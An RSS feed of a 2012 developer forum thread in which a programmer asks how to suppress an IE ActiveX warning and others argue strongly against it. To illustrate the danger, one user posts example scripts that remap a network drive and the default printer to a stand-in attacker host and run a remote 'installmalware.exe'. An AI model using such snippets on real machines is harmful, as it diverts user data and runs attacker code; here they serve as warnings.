<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" media="screen" href="/styles/xslt/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:c9="http://channel9.msdn.com">
<channel>
	<title>Channel 9 Forums - Coffeehouse - ActiveXObject</title>
	<atom:link rel="self" type="application/rss+xml" href="http://channel9.msdn.com/Forums/rss"></atom:link>
	<image>
		<url>http://mschnlnine.vo.llnwd.net/d1/Dev/App_Themes/C9/images/feedimage.png</url>
		<title>Channel 9 Forums - Coffeehouse - ActiveXObject</title>
		<link>http://channel9.msdn.com/Forums</link>
	</image>
	<description>Channel 9 keeps you up to date with the latest news and behind the scenes info from Microsoft that developers love to keep up with. From LINQ to SilverLight – Watch videos and hear about all the cool technologies coming and the people behind them.</description>
	<link>http://channel9.msdn.com/Forums</link>
	<language>en</language>
	<pubDate>Sun, 26 May 2013 09:23:31 GMT</pubDate>
	<lastBuildDate>Sun, 26 May 2013 09:23:31 GMT</lastBuildDate>
	<generator>Rev9</generator>
	<c9:totalResults>16</c9:totalResults>
	<c9:pageCount>-16</c9:pageCount>
	<c9:pageSize>-1</c9:pageSize>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p>&nbsp;I have the following javascript:<br><pre class="brush: text">var WshNetwork = new ActiveXObject(&quot;WScript.Network&quot;);
var Drives = WshNetwork.EnumNetworkDrives();</pre></p><p>Which gives me this warning:<br>&quot;An ActiveX control on this page might be unsafe to interact with other parts of the page. Do you want to allow this interaction? &nbsp;YES &nbsp;NO&quot;</p><p>Does anyone know how I can make it so that I can ask the user to install or do something so that that message doesn't pop up again?</p><p>&nbsp;</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/5c4c3bb7ed3640cfbea7a0d1014a73b8#5c4c3bb7ed3640cfbea7a0d1014a73b8</link>
		<pubDate>Wed, 19 Sep 2012 20:03:08 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/5c4c3bb7ed3640cfbea7a0d1014a73b8#5c4c3bb7ed3640cfbea7a0d1014a73b8</guid>
		<dc:creator>pavone</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/pavone/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p></p><blockquote><div class="quoteText"><p></p><p><a class="permalink" title="Post Permalink" href="/Forums/Coffeehouse/ActiveXObject/5c4c3bb7ed3640cfbea7a0d1014a73b8">3 minutes&nbsp;ago</a>, <a href="/Niners/pavone">pavone</a> wrote</p><p>&nbsp;I have the following javascript:</p><div class="syntaxhighlighterHolder"><div id="highlighter_499379" class="syntaxhighlighter text"><table border="0" cellspacing="0" cellpadding="0"><tbody><tr><td class="gutter"><div class="line number1 index0 alt2">1</div><div class="line number2 index1 alt1">2</div></td><td class="code"><div class="container"><div class="line number1 index0 alt2"><code class="text plain">var WshNetwork = new ActiveXObject(&quot;WScript.Network&quot;);</code></div><div class="line number2 index1 alt1"><code class="text plain">var Drives = WshNetwork.EnumNetworkDrives();</code></div></div></td></tr></tbody></table></div></div><p>Which gives me this warning:<br>&quot;An ActiveX control on this page might be unsafe to interact with other parts of the page. Do you want to allow this interaction? &nbsp;YES &nbsp;NO&quot;</p><p>Does anyone know how I can make it so that I can ask the user to install or do something so that that message doesn't pop up again?</p><p></p></div></blockquote><p></p><p>Oh boy. You want to do that in javascript? Please don't. By turning that warning off you would allow any web site to start running commands against your network. Not, I think, something you want to do.</p><p>&nbsp;</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/306e52f0239643d4b395a0d1014bf361#306e52f0239643d4b395a0d1014bf361</link>
		<pubDate>Wed, 19 Sep 2012 20:08:35 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/306e52f0239643d4b395a0d1014bf361#306e52f0239643d4b395a0d1014bf361</guid>
		<dc:creator>blowdart</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/blowdart/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p>@<a href="/Forums/Coffeehouse/ActiveXObject#c306e52f0239643d4b395a0d1014bf361">blowdart</a>: &#43;1</p><p>I'm a tad afraid to ask why you'd ever want to do that in the first place?</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/b41a06cba6794a62a596a0d1014deb10#b41a06cba6794a62a596a0d1014deb10</link>
		<pubDate>Wed, 19 Sep 2012 20:15:45 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/b41a06cba6794a62a596a0d1014deb10#b41a06cba6794a62a596a0d1014deb10</guid>
		<dc:creator>AndyC</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/AndyC/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p>&nbsp;No other way to do what I need I'm afraid. Not the method I'd prefer of doing it either, but I'm just the junior code monkey following instructions.&nbsp;</p><p>Preferably I'd like that message turned off for my site only, an intranet site which only allows access to a few selected people. But any method to turn that message off would work, I'll leave it to the users whether they want to or not.&nbsp;</p><p>What I'm doing is, reading users' mapped drives to the actual UNC paths so I can copy files from whatever mapped path they select.&nbsp;</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/a5a4fd466a2844849a04a0d1014e42a1#a5a4fd466a2844849a04a0d1014e42a1</link>
		<pubDate>Wed, 19 Sep 2012 20:17:00 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/a5a4fd466a2844849a04a0d1014e42a1#a5a4fd466a2844849a04a0d1014e42a1</guid>
		<dc:creator>pavone</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/pavone/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p>The only way to do <em>exactly</em> that would be to mark the WSH object as &quot;Safe for Scripting&quot;, which would basically hand complete and total control of the PC over to any webpage that fancied it. Which would be an <em>epically</em> bad idea by anyone's standards.</p><p>For a very limited usage scenario, and given that your end user's are clearly using IE, why not just create a custom ActiveX control marked as safe-for-scripting that performs the correct drive enumeration for you? Given it'll be internal only, it's very unlikely some random website would prod at and even if they did, it'd only offer very constrained functionality rather than that provided by a generic scripting control.</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/4e5aeecc699e49eb9f75a0d10161c490#4e5aeecc699e49eb9f75a0d10161c490</link>
		<pubDate>Wed, 19 Sep 2012 21:28:01 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/4e5aeecc699e49eb9f75a0d10161c490#4e5aeecc699e49eb9f75a0d10161c490</guid>
		<dc:creator>AndyC</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/AndyC/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p></p><blockquote><div class="quoteText"><p></p><p><a class="permalink" title="Post Permalink" href="/Forums/Coffeehouse/ActiveXObject/5c4c3bb7ed3640cfbea7a0d1014a73b8">4 hours&nbsp;ago</a>, <a href="/Niners/pavone">pavone</a> wrote</p><p>Does anyone know how I can make it so that I can ask the user to install or do something so that that message doesn't pop up again?</p><p></p></div></blockquote><p></p><p>Add this site to the trusted zone. not automatically, but you can ask the user to do it.</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/dd9e9088d241415b8643a0d2000cdd96#dd9e9088d241415b8643a0d2000cdd96</link>
		<pubDate>Thu, 20 Sep 2012 00:46:50 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/dd9e9088d241415b8643a0d2000cdd96#dd9e9088d241415b8643a0d2000cdd96</guid>
		<dc:creator>felix9</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/felix9/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p>Try putting the code you want to run in a JS file, and then asking the users to download the script and run it on their machine.</p><p>At least then your users would be&nbsp;<em>choosing</em> to hand their machine to the website on a site-by-site basis.</p><p>If you have any kind of security policy at your work, you will certainly be breaching it by marking things like WScript.Network as &quot;Safe for Scripting&quot;.</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/69180f5d282043b0a0a2a0d200895f1f#69180f5d282043b0a0a2a0d200895f1f</link>
		<pubDate>Thu, 20 Sep 2012 08:20:09 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/69180f5d282043b0a0a2a0d200895f1f#69180f5d282043b0a0a2a0d200895f1f</guid>
		<dc:creator>evildictaitor</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/evildictaitor/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p></p><blockquote><div class="quoteText"><p></p><p><a class="permalink" title="Post Permalink" href="/Forums/Coffeehouse/ActiveXObject/a5a4fd466a2844849a04a0d1014e42a1">16 hours&nbsp;ago</a>, <a href="/Niners/pavone">pavone</a> wrote</p><p>&nbsp;No other way to do what I need I'm afraid. Not the method I'd prefer of doing it either, but I'm just the junior code monkey following instructions.&nbsp;</p><p>Preferably I'd like that message turned off for my site only, an intranet site which only allows access to a few selected people. But any method to turn that message off would work, I'll leave it to the users whether they want to or not.&nbsp;</p><p>What I'm doing is, reading users' mapped drives to the actual UNC paths so I can copy files from whatever mapped path they select.&nbsp;</p><p></p></div></blockquote><p></p><p>then please please talk to the boss about this .... point out that multiple developers are all saying this is really not a good idea, some of us have been developing for a *LONG TIME* like over 20 years and we know what we are saying. also one of the folks here who is saying this works for microsoft and knows a thing or two about web servers ....</p><p>I know that in some places there is a trend to &quot;do it all in a web page&quot; as that removes the need to deploy software on desktops and they think that is the way to go... sometimes that is true but not all the time.</p><p>one of the reasons that some folks used to bash Microsoft was they used to just let you run anything you wanted with very little to stop the user from totally f**** ing them selves.</p><p>this is not a good idea,&nbsp; if you start allowing script on a web page to have local machine access rights then you become wide open to all kinds of evil attacks .....</p><p>if you let it enumerate drives what else can it do ? you might also then be allowing a command to format a drive or delete files or copy stuff w/o asking the user for permsssion.</p><p>please re-think this.</p><p>&nbsp;</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/523a3b2a88ec4756944ea0d200dcb39d#523a3b2a88ec4756944ea0d200dcb39d</link>
		<pubDate>Thu, 20 Sep 2012 13:23:32 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/523a3b2a88ec4756944ea0d200dcb39d#523a3b2a88ec4756944ea0d200dcb39d</guid>
		<dc:creator>figuerres</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/figuerres/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p></p><blockquote><div class="quoteText"><p></p><p><a class="permalink" title="Post Permalink" href="/Forums/Coffeehouse/ActiveXObject/523a3b2a88ec4756944ea0d200dcb39d">a moment&nbsp;ago</a>, <a href="/Niners/figuerres">figuerres</a> wrote</p><p>also one of the folks here who is saying this works for microsoft and knows a thing or two about web servers ....</p><p></p></div></blockquote><p></p><p>And has written a book on web security.</p><p>&nbsp;</p><p>And yes, once you all wscript you allow deletion of files, copying of files, generally messing around with the file system, network drives, all sorts of other fun things.</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/28e7ba307f3146fea929a0d200dd29cc#28e7ba307f3146fea929a0d200dd29cc</link>
		<pubDate>Thu, 20 Sep 2012 13:25:13 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/28e7ba307f3146fea929a0d200dd29cc#28e7ba307f3146fea929a0d200dd29cc</guid>
		<dc:creator>blowdart</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/blowdart/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p>&lt;html&gt;<br>&nbsp; &lt;head&gt;&lt;title&gt;Look! Dancing bunnies!&lt;/title&gt;&lt;/head&gt;<br>&nbsp; &lt;body&gt;<br>&nbsp; &nbsp; &lt;img src=&quot;<a href="http://www.evilbunnies.com/picture.gif&quot;">http&#58;&#47;&#47;www.evilbunnies.com&#47;picture.gif&#34;</a> width=100 height=100 /&gt;<br>&nbsp; &nbsp; &lt;script&gt;<br>var objNet&nbsp;= new ActiveXObject(&quot;WScript.Network&quot;);<br>objNet.RemoveNetworkDrive(&quot;Z:&quot;); // remove the &quot;customer information&quot; drive<br>objNet.MapNetworkDrive(&quot;Z:&quot;, &quot;\\evilbunnies.com\netdrive\&quot;); // replace it with an Internet drive<br><br>var user = objNet.Username;<br><br>&nbsp; setTimeout(&quot;alert('Oi! &quot;&#43;user&#43;&quot;! This is the head of IT, noticing that you're not doing work! Get back to work putting client data in the Z: drive, or I'll have your head!')&quot;, 1000);<br>&nbsp; &nbsp;&lt;/script&gt;<br>&lt;/body&gt;&lt;/html&gt;</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/fc7c5150b1984d0e9217a0d200e6f4c6#fc7c5150b1984d0e9217a0d200e6f4c6</link>
		<pubDate>Thu, 20 Sep 2012 14:00:53 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/fc7c5150b1984d0e9217a0d200e6f4c6#fc7c5150b1984d0e9217a0d200e6f4c6</guid>
		<dc:creator>evildictaitor</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/evildictaitor/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p>Also:</p><p>objNet.AddWindowsPrinterConnection(&quot;\\evilbunnies\printer&quot;);<br>objNet.SetDefaultPrinter(&quot;\\evilbunnies\printer&quot;);<br>alert(&quot;Shouldn't you get back to work, printing out your private emails and documents?&quot;);</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/f814a94eb49f47b882f7a0d200e7b0b9#f814a94eb49f47b882f7a0d200e7b0b9</link>
		<pubDate>Thu, 20 Sep 2012 14:03:33 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/f814a94eb49f47b882f7a0d200e7b0b9#f814a94eb49f47b882f7a0d200e7b0b9</guid>
		<dc:creator>evildictaitor</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/evildictaitor/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p></p><blockquote><div class="quoteText"><p></p><p>Blowdart said:</p><p>And yes, once you all wscript you allow deletion of files, copying of files, generally messing around with the file system, network drives, all sorts of other fun things.</p><p></p></div></blockquote><p></p><p>WScript is even worse than WScript.Network:</p><p>WScript.Exec(&quot;\\evilbunnies.com\installmalware.exe&quot;, 0);</p><p>Sad times for your business if you allow it from the Internet zone <img src='http://ecn.channel9.msdn.com/o9/content/images/emoticons/emotion-6.gif?v=c9' alt='Sad' /></p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/068d716c33ff4f47905ca0d200e829e1#068d716c33ff4f47905ca0d200e829e1</link>
		<pubDate>Thu, 20 Sep 2012 14:05:16 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/068d716c33ff4f47905ca0d200e829e1#068d716c33ff4f47905ca0d200e829e1</guid>
		<dc:creator>evildictaitor</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/evildictaitor/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p></p><blockquote><div class="quoteText"><p></p><p>Pavone said:</p><p>but I'm just the junior code monkey following instructions.&nbsp;</p><p></p></div></blockquote><p></p><p>You're the junior code money who will be fired when your company gets owned up by your foolish actions.</p><p>Don't play the game of &quot;it'll never happen to me&quot; or &quot;security is just some theoretical risk&quot;. People <em>can&nbsp;</em>and<em> do&nbsp;</em>own-up small companies, and when it happens to yours, your fingerprints will be on the trigger when the CEO comes looking for a scapegoat.</p><p>Play it safe. Make sure you play no part in a decision that could very well lead to your company losing all of it's trade secrets and customer details. You really don't want to be the guy that let that happen.</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/da6b9657d9de4bf2a710a0d200e9100a#da6b9657d9de4bf2a710a0d200e9100a</link>
		<pubDate>Thu, 20 Sep 2012 14:08:33 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/da6b9657d9de4bf2a710a0d200e9100a#da6b9657d9de4bf2a710a0d200e9100a</guid>
		<dc:creator>evildictaitor</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/evildictaitor/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p>Why does this LOB app have to be web page?</p><p>C</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/9c60ed2dce114d999d6ba0d2013181d5#9c60ed2dce114d999d6ba0d2013181d5</link>
		<pubDate>Thu, 20 Sep 2012 18:32:19 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/9c60ed2dce114d999d6ba0d2013181d5#9c60ed2dce114d999d6ba0d2013181d5</guid>
		<dc:creator>Charles</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/Charles/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p>&nbsp;I made another version where the only difference is that it requires a UNC path and makes no use of ActiveX whatsoever, if the client is fine with it, then it's all good.&nbsp;</p><p>If not, then how effective would it be to let this site into their Trusted Sites, and such only this website could make use of this ActiveX object? I noticed that this website already works in our network with the only caveat of producing a pop-up asking for confirmation, so it's not like I need to make any changes to the systems as I initially thought. Recall that this is an intranet site, no one will change internet zones.&nbsp;</p><p>Regards&nbsp;</p><p>&nbsp;</p><p>-- Update ---</p><p>Looks like browse with UNC path will do fine.</p><p>Thanks for the feedback.</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/1936d16863844601a2daa0d20145a39c#1936d16863844601a2daa0d20145a39c</link>
		<pubDate>Thu, 20 Sep 2012 19:45:36 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/1936d16863844601a2daa0d20145a39c#1936d16863844601a2daa0d20145a39c</guid>
		<dc:creator>pavone</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/pavone/Discussions/RSS</wfw:commentRss>
	</item>
	<item>
		<title>Coffeehouse - ActiveXObject</title>
		<description><![CDATA[<p></p><blockquote><div class="quoteText"><p></p><p><a class="permalink" title="Post Permalink" href="/Forums/Coffeehouse/ActiveXObject/9c60ed2dce114d999d6ba0d2013181d5">1 hour&nbsp;ago</a>, <a href="/Niners/Charles">Charles</a> wrote</p><p>Why does this LOB app have to be web page?</p><p>C</p><p></p></div></blockquote><p></p><p>&nbsp;</p><p>well i am guessing here based on what the OP has posted so far:&nbsp; they like using web pages at that company.</p><p>I have seen this kind of thinking many times before Charles.&nbsp;&nbsp; for example i worked at one point on an app for a fairly large business and the app had to get data from 2 different web sites&nbsp; by driving websites around ( lot's of crazy code doing web posts / gets and forms) to then get them to send back comma delimited data replies that i then had to clean up and import the data into a database.</p><p>the suppliers did not have a simple way to pull a data feed any other way, they included FedEx.&nbsp; the data was not the normal shipping data, this had to do with cargo ships bills of lading originating in china coming to ports on the US east coast.</p><p>when i was brought in the app did not automate importing the data, humans had to follow a 25 to 30 step manual process. errors in that process did not show up for weeks.... i made it a 5 step process that reduced the errors and the time it took them.</p><p>it took 2 months to get them to ok using .net on 3 computers to run the app.</p><p>as a consultant i had to play nice and get the staff happy with the idea, in the end they loved what i was doing and all that but then the business was sold and we all moved on to other stuff.</p><p>this was a business that had probably 10,000 desktop pc's running Windows 2000 Pro in 2005-2006</p>]]></description>
		<link>http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/3464b601a8344f819edaa0d20148e63a#3464b601a8344f819edaa0d20148e63a</link>
		<pubDate>Thu, 20 Sep 2012 19:57:29 GMT</pubDate>
		<guid isPermaLink="false">http://channel9.msdn.com/Forums/Coffeehouse/ActiveXObject/3464b601a8344f819edaa0d20148e63a#3464b601a8344f819edaa0d20148e63a</guid>
		<dc:creator>figuerres</dc:creator>
		<slash:comments>16</slash:comments>
		<wfw:commentRss>http://channel9.msdn.com/Niners/figuerres/Discussions/RSS</wfw:commentRss>
	</item>
</channel>
</rss>